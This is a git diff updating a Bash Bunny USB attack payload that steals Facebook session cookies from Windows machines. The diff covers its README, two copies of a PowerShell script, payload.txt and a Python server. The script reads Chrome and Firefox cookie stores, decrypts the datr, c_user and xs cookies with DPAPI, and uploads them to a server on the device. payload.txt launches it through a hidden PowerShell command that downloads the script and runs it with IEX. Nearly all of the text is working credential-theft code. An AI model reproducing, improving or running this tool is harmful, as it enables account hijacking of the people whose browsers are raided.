diff --git a/payloads/library/WindowsCookies/README.md b/payloads/library/WindowsCookies/README.md old mode 100644 new mode 100755 index c5ff331b..23d6c05a --- a/payloads/library/WindowsCookies/README.md +++ b/payloads/library/WindowsCookies/README.md @@ -1,13 +1,13 @@ # WindowsCookies for Bash Bunnys Author: oXis -Version: Version 2.0 +Version: Version 2.1 Credit: illwill, sekirkity, EmpireProject ## Description Based on BrowserCreds from illwill, this version grabs Facebook session cookies from Chrome/Firefox on Windows, decrypt them and put them in /root/udisk/loot/FacebookSession -Only works for Chrome/Firefox on Windows. Tested on two different Windows 10 machines. +Only works for Chrome/Firefox on Windows. Tested on two different Windows 10 machines, now works on Windows 7 (fixed powershell regex) Only payload.txt, server.py and p are required. Server.py will load a local HTTP server, the script is downloaded from that server and then uploads the cookies to it. @@ -16,6 +16,6 @@ Server.py will load a local HTTP server, the script is downloaded from that serv | LED | Status | | ---------------- | -------------------------------------- | | Blue (blinking) | Payload init | -| White (blinking) | Setup RNDIS_ETHERNET | +| Yellow (blinking)| Setup RNDIS_ETHERNET | | Green (blinking) | Done | diff --git a/payloads/library/WindowsCookies/get_facebook_cookies.ps1 b/payloads/library/WindowsCookies/get_facebook_cookies.ps1 old mode 100644 new mode 100755 index b3eabccc..09038dc6 --- a/payloads/library/WindowsCookies/get_facebook_cookies.ps1 +++ b/payloads/library/WindowsCookies/get_facebook_cookies.ps1 @@ -1,118 +1,124 @@ -# Instructions: import the module, then perform the commanded needed. - -# Chrome Facebook cookies extraction -# Use: Get-FacebookCreds [path to Login Data] -# Path is optional, use if automatic search doesn't work - -function Get-FacebookCreds-Firefox() { - Param( - [String]$Path - ) - - if ([String]::IsNullOrEmpty($Path)) { - # $Path = "$env:USERPROFILE\AppData\Local\Google\Chrome\User Data\Default\Cookies" - $path = Get-ChildItem "$env:USERPROFILE\AppData\Roaming\Mozilla\Firefox\Profiles\*.default\cookies.sqlite" - } - - if (![system.io.file]::Exists($Path)) - { - Write-Error 'Chrome db file doesnt exist, or invalid file path specified.' - Break - } - - Add-Type -AssemblyName System.Security - # Credit to Matt Graber for his technique on using regular expressions to search for binary data - $Stream = New-Object IO.FileStream -ArgumentList "$Path", 'Open', 'Read', 'ReadWrite' - $Encoding = [system.Text.Encoding]::GetEncoding(28591) - $StreamReader = New-Object IO.StreamReader -ArgumentList $Stream, $Encoding - $BinaryText = $StreamReader.ReadToEnd() - $StreamReader.Close() - $Stream.Close() - - # First the magic bytes for the facebook string, datr size is 24 - $PwdRegex = [Regex] '\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x64\x61\x74\x72([\s\S]{24})' - $PwdMatches = $PwdRegex.Matches($BinaryText) - $datr = $PwdMatches.groups[1] - - # First the magic bytes for the facebook string, c_user size is 15 - $PwdRegex = [Regex] '\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x63\x5F\x75\x73\x65\x72([\s\S]{15})' - $PwdMatches = $PwdRegex.Matches($BinaryText) - $c_user = $PwdMatches.groups[1] - - # First the magic bytes for the facebook string, xs size is 44 - $PwdRegex = [Regex] '\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x78\x73([\s\S]{44})' - $PwdMatches = $PwdRegex.Matches($BinaryText) - $xs = $PwdMatches.groups[1] - - "$env:computername ---> " - "datr is $datr ###" - "c_user is $c_user ###" - "xs is $xs ###" -} - -function Get-FacebookCreds-Chrome() { - Param( - [String]$Path - ) - - if ([String]::IsNullOrEmpty($Path)) { - $Path = "$env:USERPROFILE\AppData\Local\Google\Chrome\User Data\Default\Cookies" - } - - if (![system.io.file]::Exists($Path)) - { - Write-Error 'Chrome db file doesnt exist, or invalid file path specified.' - Break - } - - Add-Type -AssemblyName System.Security - # Credit to Matt Graber for his technique on using regular expressions to search for binary data - $Stream = New-Object IO.FileStream -ArgumentList "$Path", 'Open', 'Read', 'ReadWrite' - $Encoding = [system.Text.Encoding]::GetEncoding(28591) - $StreamReader = New-Object IO.StreamReader -ArgumentList $Stream, $Encoding - $BinaryText = $StreamReader.ReadToEnd() - $StreamReader.Close() - $Stream.Close() - - # First the magic bytes for the facebook string, datr size is 242 + 4 and hex is \x64\x61\x74\x72 - $PwdRegex = [Regex] '\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D(\x64\x61\x74\x72)\x2F[\s\S]*?(\x01\x00\x00\x00[\s\S]{242})' - $PwdMatches = $PwdRegex.Matches($BinaryText) - - # [System.BitConverter]::ToString($Encoding.GetBytes($PwdMatches.groups[2])); - $Pwd = $Encoding.GetBytes($PwdMatches.groups[2]) - $Decrypt = [System.Security.Cryptography.ProtectedData]::Unprotect($Pwd,$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser) - $datr = [System.Text.Encoding]::Default.GetString($Decrypt) - - - # First the magic bytes for the facebook string, c_user size is 226 + 4 and hex is \x63\x5F\x75\x73\x65\x72 - $PwdRegex = [Regex] '\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D(\x63\x5F\x75\x73\x65\x72)\x2F[\s\S]*?(\x01\x00\x00\x00[\s\S]{226})' - $PwdMatches = $PwdRegex.Matches($BinaryText) - - # [System.BitConverter]::ToString($Encoding.GetBytes($PwdMatches.groups[2])); - $Pwd = $Encoding.GetBytes($PwdMatches.groups[2]) - $Decrypt = [System.Security.Cryptography.ProtectedData]::Unprotect($Pwd,$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser) - $c_user = [System.Text.Encoding]::Default.GetString($Decrypt) - - - # First the magic bytes for the facebook string, xs size is 258 + 4 and hex is \x78\x73 - $PwdRegex = [Regex] '\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D(\x78\x73)\x2F[\s\S]*?(\x01\x00\x00\x00[\s\S]{258})' - $PwdMatches = $PwdRegex.Matches($BinaryText) - - # [System.BitConverter]::ToString($Encoding.GetBytes($PwdMatches.groups[2])); - $Pwd = $Encoding.GetBytes($PwdMatches.groups[2]) - $Decrypt = [System.Security.Cryptography.ProtectedData]::Unprotect($Pwd,$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser) - $xs = [System.Text.Encoding]::Default.GetString($Decrypt) - - "$env:computername ---> " - "datr is $datr ###" - "c_user is $c_user ###" - "xs is $xs ###" -} - - -function Payload() { - - Invoke-Expression (New-Object Net.WebClient).UploadString('http://172.16.64.1:8080/l', $(Get-FacebookCreds-Chrome)) - Invoke-Expression (New-Object Net.WebClient).UploadString('http://172.16.64.1:8080/l', $(Get-FacebookCreds-Firefox)) - -} +# Instructions: import the module, then perform the commanded needed. + +# Chrome Facebook cookies extraction +# Use: Get-FacebookCreds [path to Login Data] +# Path is optional, use if automatic search doesn't work + +function Get-FacebookCreds-Firefox() { + Param( + [String]$Path + ) + + if ([String]::IsNullOrEmpty($Path)) { + # $Path = "$env:USERPROFILE\AppData\Local\Google\Chrome\User Data\Default\Cookies" + $path = Get-ChildItem "$env:USERPROFILE\AppData\Roaming\Mozilla\Firefox\Profiles\*.default\cookies.sqlite" + } + + if (![system.io.file]::Exists($Path)) + { + Write-Error 'Chrome db file doesnt exist, or invalid file path specified.' + Break + } + + Add-Type -AssemblyName System.Security + # Credit to Matt Graber for his technique on using regular expressions to search for binary data + $Stream = New-Object IO.FileStream -ArgumentList "$Path", 'Open', 'Read', 'ReadWrite' + $Encoding = [system.Text.Encoding]::GetEncoding(28591) + $StreamReader = New-Object IO.StreamReader -ArgumentList $Stream, $Encoding + $BinaryText = $StreamReader.ReadToEnd() + $StreamReader.Close() + $Stream.Close() + + # First the magic bytes for the facebook string, datr size is 24 + $PwdRegex = [Regex] '\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x64\x61\x74\x72([\s\S]{24})' + $PwdMatches = $PwdRegex.Matches($BinaryText) + $datr = $PwdMatches | ForEach-Object { $_.Groups[1].Value } + # $datr = $PwdMatches.groups[1] + + # First the magic bytes for the facebook string, c_user size is 15 + $PwdRegex = [Regex] '\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x63\x5F\x75\x73\x65\x72([\s\S]{15})' + $PwdMatches = $PwdRegex.Matches($BinaryText) + $c_user = $PwdMatches | ForEach-Object { $_.Groups[1].Value } + # $c_user = $PwdMatches.groups[1] + + # First the magic bytes for the facebook string, xs size is 44 + $PwdRegex = [Regex] '\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x78\x73([\s\S]{44})' + $PwdMatches = $PwdRegex.Matches($BinaryText) + $xs = $PwdMatches | ForEach-Object { $_.Groups[1].Value } + # $xs = $PwdMatches.groups[1] + + "Firefox ---> " + "datr is $datr ###" + "c_user is $c_user ###" + "xs is $xs ###" +} + +function Get-FacebookCreds-Chrome() { + Param( + [String]$Path + ) + + if ([String]::IsNullOrEmpty($Path)) { + $Path = "$env:USERPROFILE\AppData\Local\Google\Chrome\User Data\Default\Cookies" + } + + if (![system.io.file]::Exists($Path)) + { + Write-Error 'Chrome db file doesnt exist, or invalid file path specified.' + Break + } + + Add-Type -AssemblyName System.Security + # Credit to Matt Graber for his technique on using regular expressions to search for binary data + $Stream = New-Object IO.FileStream -ArgumentList "$Path", 'Open', 'Read', 'ReadWrite' + $Encoding = [system.Text.Encoding]::GetEncoding(28591) + $StreamReader = New-Object IO.StreamReader -ArgumentList $Stream, $Encoding + $BinaryText = $StreamReader.ReadToEnd() + $StreamReader.Close() + $Stream.Close() + + # First the magic bytes for the facebook string, datr size is 242 + 4 and hex is \x64\x61\x74\x72 + $PwdRegex = [Regex] '\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D(\x64\x61\x74\x72)\x2F[\s\S]*?(\x01\x00\x00\x00[\s\S]{242})' + $PwdMatches = $PwdRegex.Matches($BinaryText) + + # [System.BitConverter]::ToString($Encoding.GetBytes($PwdMatches.groups[2])); + $Pwd = $Encoding.GetBytes(($PwdMatches | ForEach-Object { $_.Groups[2].Value })) + # $Pwd = $Encoding.GetBytes($PwdMatches.groups[2]) + $Decrypt = [System.Security.Cryptography.ProtectedData]::Unprotect($Pwd,$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser) + $datr = [System.Text.Encoding]::Default.GetString($Decrypt) + + + # First the magic bytes for the facebook string, c_user size is 226 + 4 and hex is \x63\x5F\x75\x73\x65\x72 + $PwdRegex = [Regex] '\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D(\x63\x5F\x75\x73\x65\x72)\x2F[\s\S]*?(\x01\x00\x00\x00[\s\S]{226})' + $PwdMatches = $PwdRegex.Matches($BinaryText) + + # [System.BitConverter]::ToString($Encoding.GetBytes($PwdMatches.groups[2])); + $Pwd = $Encoding.GetBytes(($PwdMatches | ForEach-Object { $_.Groups[2].Value })) + # $Pwd = $Encoding.GetBytes($PwdMatches.groups[2]) + $Decrypt = [System.Security.Cryptography.ProtectedData]::Unprotect($Pwd,$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser) + $c_user = [System.Text.Encoding]::Default.GetString($Decrypt) + + + # First the magic bytes for the facebook string, xs size is 258 + 4 and hex is \x78\x73 + $PwdRegex = [Regex] '\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D(\x78\x73)\x2F[\s\S]*?(\x01\x00\x00\x00[\s\S]{258})' + $PwdMatches = $PwdRegex.Matches($BinaryText) + + # [System.BitConverter]::ToString($Encoding.GetBytes($PwdMatches.groups[2])); + $Pwd = $Encoding.GetBytes(($PwdMatches | ForEach-Object { $_.Groups[2].Value })) + # $Pwd = $Encoding.GetBytes($PwdMatches.groups[2]) + $Decrypt = [System.Security.Cryptography.ProtectedData]::Unprotect($Pwd,$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser) + $xs = [System.Text.Encoding]::Default.GetString($Decrypt) + + "Chrome ---> " + "datr is $datr ###" + "c_user is $c_user ###" + "xs is $xs ###" +} + + +function Payload() { + + Invoke-Expression (New-Object Net.WebClient).UploadString("http://172.16.64.1:8080/$env:computername", $(Get-FacebookCreds-Chrome)) + Invoke-Expression (New-Object Net.WebClient).UploadString("http://172.16.64.1:8080/$env:computername", $(Get-FacebookCreds-Firefox)) + +} \ No newline at end of file diff --git a/payloads/library/WindowsCookies/p b/payloads/library/WindowsCookies/p old mode 100644 new mode 100755 index b3eabccc..09038dc6 --- a/payloads/library/WindowsCookies/p +++ b/payloads/library/WindowsCookies/p @@ -1,118 +1,124 @@ -# Instructions: import the module, then perform the commanded needed. - -# Chrome Facebook cookies extraction -# Use: Get-FacebookCreds [path to Login Data] -# Path is optional, use if automatic search doesn't work - -function Get-FacebookCreds-Firefox() { - Param( - [String]$Path - ) - - if ([String]::IsNullOrEmpty($Path)) { - # $Path = "$env:USERPROFILE\AppData\Local\Google\Chrome\User Data\Default\Cookies" - $path = Get-ChildItem "$env:USERPROFILE\AppData\Roaming\Mozilla\Firefox\Profiles\*.default\cookies.sqlite" - } - - if (![system.io.file]::Exists($Path)) - { - Write-Error 'Chrome db file doesnt exist, or invalid file path specified.' - Break - } - - Add-Type -AssemblyName System.Security - # Credit to Matt Graber for his technique on using regular expressions to search for binary data - $Stream = New-Object IO.FileStream -ArgumentList "$Path", 'Open', 'Read', 'ReadWrite' - $Encoding = [system.Text.Encoding]::GetEncoding(28591) - $StreamReader = New-Object IO.StreamReader -ArgumentList $Stream, $Encoding - $BinaryText = $StreamReader.ReadToEnd() - $StreamReader.Close() - $Stream.Close() - - # First the magic bytes for the facebook string, datr size is 24 - $PwdRegex = [Regex] '\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x64\x61\x74\x72([\s\S]{24})' - $PwdMatches = $PwdRegex.Matches($BinaryText) - $datr = $PwdMatches.groups[1] - - # First the magic bytes for the facebook string, c_user size is 15 - $PwdRegex = [Regex] '\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x63\x5F\x75\x73\x65\x72([\s\S]{15})' - $PwdMatches = $PwdRegex.Matches($BinaryText) - $c_user = $PwdMatches.groups[1] - - # First the magic bytes for the facebook string, xs size is 44 - $PwdRegex = [Regex] '\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x78\x73([\s\S]{44})' - $PwdMatches = $PwdRegex.Matches($BinaryText) - $xs = $PwdMatches.groups[1] - - "$env:computername ---> " - "datr is $datr ###" - "c_user is $c_user ###" - "xs is $xs ###" -} - -function Get-FacebookCreds-Chrome() { - Param( - [String]$Path - ) - - if ([String]::IsNullOrEmpty($Path)) { - $Path = "$env:USERPROFILE\AppData\Local\Google\Chrome\User Data\Default\Cookies" - } - - if (![system.io.file]::Exists($Path)) - { - Write-Error 'Chrome db file doesnt exist, or invalid file path specified.' - Break - } - - Add-Type -AssemblyName System.Security - # Credit to Matt Graber for his technique on using regular expressions to search for binary data - $Stream = New-Object IO.FileStream -ArgumentList "$Path", 'Open', 'Read', 'ReadWrite' - $Encoding = [system.Text.Encoding]::GetEncoding(28591) - $StreamReader = New-Object IO.StreamReader -ArgumentList $Stream, $Encoding - $BinaryText = $StreamReader.ReadToEnd() - $StreamReader.Close() - $Stream.Close() - - # First the magic bytes for the facebook string, datr size is 242 + 4 and hex is \x64\x61\x74\x72 - $PwdRegex = [Regex] '\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D(\x64\x61\x74\x72)\x2F[\s\S]*?(\x01\x00\x00\x00[\s\S]{242})' - $PwdMatches = $PwdRegex.Matches($BinaryText) - - # [System.BitConverter]::ToString($Encoding.GetBytes($PwdMatches.groups[2])); - $Pwd = $Encoding.GetBytes($PwdMatches.groups[2]) - $Decrypt = [System.Security.Cryptography.ProtectedData]::Unprotect($Pwd,$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser) - $datr = [System.Text.Encoding]::Default.GetString($Decrypt) - - - # First the magic bytes for the facebook string, c_user size is 226 + 4 and hex is \x63\x5F\x75\x73\x65\x72 - $PwdRegex = [Regex] '\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D(\x63\x5F\x75\x73\x65\x72)\x2F[\s\S]*?(\x01\x00\x00\x00[\s\S]{226})' - $PwdMatches = $PwdRegex.Matches($BinaryText) - - # [System.BitConverter]::ToString($Encoding.GetBytes($PwdMatches.groups[2])); - $Pwd = $Encoding.GetBytes($PwdMatches.groups[2]) - $Decrypt = [System.Security.Cryptography.ProtectedData]::Unprotect($Pwd,$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser) - $c_user = [System.Text.Encoding]::Default.GetString($Decrypt) - - - # First the magic bytes for the facebook string, xs size is 258 + 4 and hex is \x78\x73 - $PwdRegex = [Regex] '\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D(\x78\x73)\x2F[\s\S]*?(\x01\x00\x00\x00[\s\S]{258})' - $PwdMatches = $PwdRegex.Matches($BinaryText) - - # [System.BitConverter]::ToString($Encoding.GetBytes($PwdMatches.groups[2])); - $Pwd = $Encoding.GetBytes($PwdMatches.groups[2]) - $Decrypt = [System.Security.Cryptography.ProtectedData]::Unprotect($Pwd,$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser) - $xs = [System.Text.Encoding]::Default.GetString($Decrypt) - - "$env:computername ---> " - "datr is $datr ###" - "c_user is $c_user ###" - "xs is $xs ###" -} - - -function Payload() { - - Invoke-Expression (New-Object Net.WebClient).UploadString('http://172.16.64.1:8080/l', $(Get-FacebookCreds-Chrome)) - Invoke-Expression (New-Object Net.WebClient).UploadString('http://172.16.64.1:8080/l', $(Get-FacebookCreds-Firefox)) - -} +# Instructions: import the module, then perform the commanded needed. + +# Chrome Facebook cookies extraction +# Use: Get-FacebookCreds [path to Login Data] +# Path is optional, use if automatic search doesn't work + +function Get-FacebookCreds-Firefox() { + Param( + [String]$Path + ) + + if ([String]::IsNullOrEmpty($Path)) { + # $Path = "$env:USERPROFILE\AppData\Local\Google\Chrome\User Data\Default\Cookies" + $path = Get-ChildItem "$env:USERPROFILE\AppData\Roaming\Mozilla\Firefox\Profiles\*.default\cookies.sqlite" + } + + if (![system.io.file]::Exists($Path)) + { + Write-Error 'Chrome db file doesnt exist, or invalid file path specified.' + Break + } + + Add-Type -AssemblyName System.Security + # Credit to Matt Graber for his technique on using regular expressions to search for binary data + $Stream = New-Object IO.FileStream -ArgumentList "$Path", 'Open', 'Read', 'ReadWrite' + $Encoding = [system.Text.Encoding]::GetEncoding(28591) + $StreamReader = New-Object IO.StreamReader -ArgumentList $Stream, $Encoding + $BinaryText = $StreamReader.ReadToEnd() + $StreamReader.Close() + $Stream.Close() + + # First the magic bytes for the facebook string, datr size is 24 + $PwdRegex = [Regex] '\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x64\x61\x74\x72([\s\S]{24})' + $PwdMatches = $PwdRegex.Matches($BinaryText) + $datr = $PwdMatches | ForEach-Object { $_.Groups[1].Value } + # $datr = $PwdMatches.groups[1] + + # First the magic bytes for the facebook string, c_user size is 15 + $PwdRegex = [Regex] '\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x63\x5F\x75\x73\x65\x72([\s\S]{15})' + $PwdMatches = $PwdRegex.Matches($BinaryText) + $c_user = $PwdMatches | ForEach-Object { $_.Groups[1].Value } + # $c_user = $PwdMatches.groups[1] + + # First the magic bytes for the facebook string, xs size is 44 + $PwdRegex = [Regex] '\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x78\x73([\s\S]{44})' + $PwdMatches = $PwdRegex.Matches($BinaryText) + $xs = $PwdMatches | ForEach-Object { $_.Groups[1].Value } + # $xs = $PwdMatches.groups[1] + + "Firefox ---> " + "datr is $datr ###" + "c_user is $c_user ###" + "xs is $xs ###" +} + +function Get-FacebookCreds-Chrome() { + Param( + [String]$Path + ) + + if ([String]::IsNullOrEmpty($Path)) { + $Path = "$env:USERPROFILE\AppData\Local\Google\Chrome\User Data\Default\Cookies" + } + + if (![system.io.file]::Exists($Path)) + { + Write-Error 'Chrome db file doesnt exist, or invalid file path specified.' + Break + } + + Add-Type -AssemblyName System.Security + # Credit to Matt Graber for his technique on using regular expressions to search for binary data + $Stream = New-Object IO.FileStream -ArgumentList "$Path", 'Open', 'Read', 'ReadWrite' + $Encoding = [system.Text.Encoding]::GetEncoding(28591) + $StreamReader = New-Object IO.StreamReader -ArgumentList $Stream, $Encoding + $BinaryText = $StreamReader.ReadToEnd() + $StreamReader.Close() + $Stream.Close() + + # First the magic bytes for the facebook string, datr size is 242 + 4 and hex is \x64\x61\x74\x72 + $PwdRegex = [Regex] '\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D(\x64\x61\x74\x72)\x2F[\s\S]*?(\x01\x00\x00\x00[\s\S]{242})' + $PwdMatches = $PwdRegex.Matches($BinaryText) + + # [System.BitConverter]::ToString($Encoding.GetBytes($PwdMatches.groups[2])); + $Pwd = $Encoding.GetBytes(($PwdMatches | ForEach-Object { $_.Groups[2].Value })) + # $Pwd = $Encoding.GetBytes($PwdMatches.groups[2]) + $Decrypt = [System.Security.Cryptography.ProtectedData]::Unprotect($Pwd,$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser) + $datr = [System.Text.Encoding]::Default.GetString($Decrypt) + + + # First the magic bytes for the facebook string, c_user size is 226 + 4 and hex is \x63\x5F\x75\x73\x65\x72 + $PwdRegex = [Regex] '\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D(\x63\x5F\x75\x73\x65\x72)\x2F[\s\S]*?(\x01\x00\x00\x00[\s\S]{226})' + $PwdMatches = $PwdRegex.Matches($BinaryText) + + # [System.BitConverter]::ToString($Encoding.GetBytes($PwdMatches.groups[2])); + $Pwd = $Encoding.GetBytes(($PwdMatches | ForEach-Object { $_.Groups[2].Value })) + # $Pwd = $Encoding.GetBytes($PwdMatches.groups[2]) + $Decrypt = [System.Security.Cryptography.ProtectedData]::Unprotect($Pwd,$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser) + $c_user = [System.Text.Encoding]::Default.GetString($Decrypt) + + + # First the magic bytes for the facebook string, xs size is 258 + 4 and hex is \x78\x73 + $PwdRegex = [Regex] '\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D(\x78\x73)\x2F[\s\S]*?(\x01\x00\x00\x00[\s\S]{258})' + $PwdMatches = $PwdRegex.Matches($BinaryText) + + # [System.BitConverter]::ToString($Encoding.GetBytes($PwdMatches.groups[2])); + $Pwd = $Encoding.GetBytes(($PwdMatches | ForEach-Object { $_.Groups[2].Value })) + # $Pwd = $Encoding.GetBytes($PwdMatches.groups[2]) + $Decrypt = [System.Security.Cryptography.ProtectedData]::Unprotect($Pwd,$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser) + $xs = [System.Text.Encoding]::Default.GetString($Decrypt) + + "Chrome ---> " + "datr is $datr ###" + "c_user is $c_user ###" + "xs is $xs ###" +} + + +function Payload() { + + Invoke-Expression (New-Object Net.WebClient).UploadString("http://172.16.64.1:8080/$env:computername", $(Get-FacebookCreds-Chrome)) + Invoke-Expression (New-Object Net.WebClient).UploadString("http://172.16.64.1:8080/$env:computername", $(Get-FacebookCreds-Firefox)) + +} \ No newline at end of file diff --git a/payloads/library/WindowsCookies/payload.txt b/payloads/library/WindowsCookies/payload.txt old mode 100644 new mode 100755 index 085416a9..5bff8645 --- a/payloads/library/WindowsCookies/payload.txt +++ b/payloads/library/WindowsCookies/payload.txt @@ -2,34 +2,31 @@ # # Title: Facebook session cookies dump # Author: oXis (inspired by illwill) -# Version: 2.0 +# Version: 2.1 # -# Dumps the stored session cookies from Chrome browser by downloading a Powershell script -# then stashes them in /root/udisk/loot/FacebookSession/l -# Credits to these guys for their powershell scripts: -# https://github.com/sekirkity/BrowserGather BrowserGather.ps1 -# https://github.com/EmpireProject/Empire Get-FoxDump.ps1 -# Also credit to illwill for the BrowerCreds payload +# Dumps the stored session cookies from Chrome/Firefox browser by downloading a Powershell script +# then stashes them in /root/udisk/loot/FacebookSession/COMPUTER_NAME +# Credit to illwill for the BrowerCreds payload # # LED States # Setup.............Setup -# Blue..............Running Script -# White.............Setup RNDIS_ETHERNET +# Yellow............Setup RNDIS_ETHERNET # Green.............Got Browser Creds - LED SETUP LOOTDIR=/root/udisk/loot/FacebookSession mkdir -p $LOOTDIR + ATTACKMODE HID LED STAGE1 GET SWITCH_POSITION cd /root/udisk/payloads/$SWITCH_POSITION/ +# server.py can now instant bind sockets +iptables -A OUTPUT -p udp --dport 53 -j DROP ./server.py & -sleep 1 #Dump Chrome Cookies -RUN WIN "powershell -WindowStyle Hidden \"while(\$true){If(Test-Connection 172.16.64.1 -count 1 -quiet){sleep 2;IEX (New-Object Net.WebClient).DownloadString('http://172.16.64.1:8080/p'); Payload; exit}}\"" +RUN WIN "powershell -WindowStyle Hidden while(\$true){If(Test-Connection 172.16.64.1 -count 1 -quiet){sleep 2;IEX (New-Object Net.WebClient).DownloadString('http://172.16.64.1:8080/p'); Payload; exit}}" LED STAGE2 ATTACKMODE RNDIS_ETHERNET diff --git a/payloads/library/WindowsCookies/server.py b/payloads/library/WindowsCookies/server.py old mode 100644 new mode 100755 index 977bb6d9..46246872 --- a/payloads/library/WindowsCookies/server.py +++ b/payloads/library/WindowsCookies/server.py @@ -3,10 +3,9 @@ from os import curdir from os.path import join as pjoin from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer -# from http.server import BaseHTTPRequestHandler, HTTPServer class StoreHandler(BaseHTTPRequestHandler): - store_path = pjoin("/root/udisk/loot/FacebookSession/", 'l') + store_path = "/root/udisk/loot/FacebookSession" get_path = pjoin(curdir, 'p') def do_GET(self): @@ -18,16 +17,14 @@ class StoreHandler(BaseHTTPRequestHandler): self.wfile.write(fh.read().encode()) def do_POST(self): - if self.path == '/l': - length = self.headers['content-length'] - data = self.rfile.read(int(length)) + length = self.headers['content-length'] + data = self.rfile.read(int(length)) - with open(self.store_path, 'a') as fh: - fh.write(data.decode() + "\n") + with open(self.store_path + self.path, 'a') as fh: + fh.write(data.decode() + "\n") - self.send_response(200) + self.send_response(200) server = HTTPServer(('', 8080), StoreHandler) server.serve_forever() -